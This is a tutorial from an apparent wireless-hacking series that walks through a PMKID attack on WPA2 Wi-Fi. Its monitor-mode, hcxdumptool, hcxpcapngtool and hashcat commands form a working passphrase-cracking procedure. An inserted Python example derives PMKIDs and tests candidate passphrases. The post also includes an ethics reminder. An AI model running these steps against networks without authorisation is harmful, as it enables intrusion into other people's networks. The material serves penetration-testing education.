PMKID Attack – Crack Wi-Fi Without a Handshake

Introduction

Up to now, you’ve learned how to capture WPA2 handshakes and brute-force them with wordlists. But what if you could skip the client deauthentication entirely and grab something even faster?

Welcome to the PMKID attack — a stealthy method that lets you crack WPA2 without any connected clients.

❓ What is a PMKID?

PMKID (Pairwise Master Key Identifier) is part of WPA2’s authentication protocol. Some routers (especially with 802.11r roaming enabled) send the PMKID when the client probes the AP.

The PMKID contains:

  • MAC of the AP

  • MAC of the client (can be faked)

  • PMKID hash (our target)

This can be captured and cracked just like a WPA2 handshake, but more easily — and without forcing disconnects.

🧰 Tools Needed

  • Kali Linux (or custom Pentesting OS)

  • Wi-Fi adapter in monitor mode

  • hcxdumptool – for PMKID capture

  • hcxpcapngtool – to extract PMKID

  • Hashcat – to crack it

Step-by-Step: PMKID Attack Using hcxdumptool + Hashcat

1. Put Adapter in Monitor Mode

You can manually set your adapter to monitor mode with:

sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up

Or use the simpler method via airmon-ng:

sudo airmon-ng start wlan0

2. Capture PMKID Using hcxdumptool

Start capturing and watch the status output for PMKIDs:

sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

This will begin capturing data. Let it run for a few minutes.

✅ Look for output like:

FOUND PMKID

3. Convert the Capture for Hashcat

Convert the .pcapng file into a Hashcat-compatible format using hcxpcapngtool:

hcxpcapngtool -o pmkid_hash.hc22000 -E ssidlist.txt -I identity.txt -U user.txt -T taglist.txt pmkid.pcapng

This will generate a .hc22000 file ready for cracking.

4. Crack Using Hashcat

Now run Hashcat with your wordlist:

hashcat -m 22000 pmkid_hash.hc22000 /path/to/wordlist.txt

Explanation:

  • -m 22000: Hashcat's WPA-PBKDF2-PMKID+EAPOL mode (covers both PMKID and EAPOL handshake hashes)
  • pmkid_hash.hc22000: Converted capture file
  • /path/to/wordlist.txt: Your chosen wordlist (e.g., rockyou.txt)

If the password is in your wordlist, Hashcat will reveal it:

<network MAC>:<client MAC>:password123
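To make clear what Hashcat is actually checking in step 4, and why the PMKID described earlier can be tested offline at all, here is an added example (not part of the original post, and not code from hcxdumptool or Hashcat) that derives a PMKID from a passphrase exactly as WPA2 does: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), then PMKID = HMAC-SHA1(PMK, "PMK Name" || AP MAC || client MAC) truncated to 16 bytes. It also builds and parses the 22000 hash line that hcxpcapngtool writes. The SSID, MAC addresses and passphrase are constructed sample values; the only real-world value is the IEEE 802.11 Annex H PBKDF2 test vector used in the test. The example is written from the defender's side: it lets you compute your own AP's expected PMKID for a given passphrase and shows that every candidate costs one 4096-round PBKDF2, which is why passphrase length, not router firmware, is the real control here.

```python
import hashlib
import hmac

PBKDF2_ITERATIONS = 4096  # fixed by the WPA2 standard
PMK_LEN = 32


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK as WPA2-PSK derives it: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32)."""
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("utf-8"), ssid.encode("utf-8"), PBKDF2_ITERATIONS, PMK_LEN
    )


def mac_to_bytes(mac: str) -> bytes:
    """Accept 'aa:bb:cc:dd:ee:ff', 'aa-bb-...' or 'aabbccddeeff'."""
    raw = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(raw) != 6:
        raise ValueError("MAC address must be 6 bytes")
    return raw


def derive_pmkid(pmk: bytes, ap_mac: str, client_mac: str) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA) per IEEE 802.11."""
    data = b"PMK Name" + mac_to_bytes(ap_mac) + mac_to_bytes(client_mac)
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def make_hc22000_line(pmkid: bytes, ap_mac: str, client_mac: str, ssid: str) -> str:
    """Build a Hashcat 22000 PMKID line: WPA*01*PMKID*MACAP*MACCLIENT*ESSIDHEX***"""
    return "WPA*01*{}*{}*{}*{}***".format(
        pmkid.hex(), mac_to_bytes(ap_mac).hex(), mac_to_bytes(client_mac).hex(),
        ssid.encode("utf-8").hex(),
    )


def parse_hc22000_line(line: str) -> dict:
    """Parse a type-01 (PMKID) 22000 line back into its fields."""
    fields = line.strip().split("*")
    if len(fields) < 6 or fields[0] != "WPA" or fields[1] != "01":
        raise ValueError("not a WPA*01* PMKID line")
    return {
        "pmkid": bytes.fromhex(fields[2]),
        "ap_mac": fields[3],
        "client_mac": fields[4],
        "ssid": bytes.fromhex(fields[5]).decode("utf-8"),
    }


def passphrase_matches(line: str, candidate: str) -> bool:
    """One Hashcat-style check: does this passphrase produce the captured PMKID?

    Every call pays the full PBKDF2 cost, which is the whole point of the
    4096-iteration design; constant-time compare avoids leaking partial matches.
    """
    h = parse_hc22000_line(line)
    pmk = derive_pmk(candidate, h["ssid"])
    return hmac.compare_digest(derive_pmkid(pmk, h["ap_mac"], h["client_mac"]), h["pmkid"])


# Constructed sample network (not a real AP): use your own AP's values here.
SAMPLE_SSID = "LabNet-Example"
SAMPLE_AP_MAC = "00:11:22:33:44:55"
SAMPLE_CLIENT_MAC = "66:77:88:99:aa:bb"
SAMPLE_PASSPHRASE = "correct horse battery staple"


def sample_line() -> str:
    """The 22000 line hcxpcapngtool would emit for the constructed sample network."""
    pmk = derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID)
    pmkid = derive_pmkid(pmk, SAMPLE_AP_MAC, SAMPLE_CLIENT_MAC)
    return make_hc22000_line(pmkid, SAMPLE_AP_MAC, SAMPLE_CLIENT_MAC, SAMPLE_SSID)


if __name__ == "__main__":
    line = sample_line()
    print(line)
    print("right passphrase:", passphrase_matches(line, SAMPLE_PASSPHRASE))
    print("wrong passphrase:", passphrase_matches(line, "password123"))
```

Running it prints a WPA*01* line in the same layout as the pmkid_hash.hc22000 file from step 3, followed by True and False. The AP MAC and client MAC are inputs to the HMAC, which is why the client MAC in the capture "can be faked" without affecting crackability: the attacker chooses it, and the verifier just has to use the same value. Nothing in the derivation depends on the passphrase beyond the PBKDF2 step, so a long random passphrase is the only thing that makes the per-candidate cost add up to an infeasible total.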

Why the PMKID Attack Rocks

  • Doesn’t need clients to be connected

  • No noisy deauthentication packets

  • Faster, stealthier than handshake capture

  • Great for rogue APs or weak setups

Real-World Considerations

  • Not all routers are vulnerable (802.11r support required)

  • PMKID often available on modern routers, but not guaranteed

  • Password cracking still depends on wordlist quality

Ethics Reminder

This is a powerful technique. Only use it in lab environments or on networks you own or have written permission to test. Unauthorized attacks are illegal.

Wrapping Up

The PMKID attack is a slick, modern WPA2 exploitation method that skips the handshake drama and gives you what you need — fast. Combined with Hashcat, it’s a must-have skill in your wireless hacking toolkit.

Next up:
🎭 Part 10 – Evil Twin Attack with Fluxion: Phishing Wi-Fi Passwords with a Fake Access Point
